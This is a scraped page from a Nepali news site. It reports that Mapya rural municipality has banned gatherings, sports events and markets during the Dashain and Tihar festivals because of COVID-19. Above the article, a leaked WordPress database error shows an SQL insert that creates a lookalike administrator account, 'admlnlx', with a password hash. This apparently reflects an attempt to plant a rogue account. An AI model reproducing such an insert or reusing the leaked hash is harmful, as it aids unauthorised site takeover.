WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bqfe/4SR0TqgLb7EyFP3lbv8U8aNvo.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:51:58', '', 'admlnlx', 'admlnlx')

माप्यमा कार्यक्रम तथा भेला सम्मेलन गर्न नपाइने – Gaule Khabar

माप्यमा कार्यक्रम तथा भेला सम्मेलन गर्न नपाइने

माप्यमा कार्यक्रम तथा भेला सम्मेलन गर्न नपाइने

हालको विश्व महामारी कोभिड १९ लाई मध्य नजरमा राख्दै आउदै गरेको हिन्दुहरुको चाड दशंै तिहार लगायत सवैखाले भेला जमघट,खेलकुद विभिन्न त्रियाकलापहरु सभा सम्मेलन,खेलकुद तथा साप्ताहिक बजारहरुलाई वन्द गर्न निर्णय गरेको हो ।

दशंैको वेला अत्यधिक रुपमा आउतजावत भएकोले पनि झन संक्रमणको जोखिम बढन सक्ने माप्य गाँउपालिका पवतmा तेज वहादुर मगरले जानकारी दिनुभयो ।
मिति २०७७ ६ २८ गते बसेको गांँउपालिका स्तरिय वैठकले सार्वजनिक विज्ञप्ति जारी गरी माप्य समुदायहरुको स्वस्थ्य स्थितिलाई ध्यानमा राख्दै सार्वजनिक विज्ञप्ति मार्फत सुचना जारी गरिएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका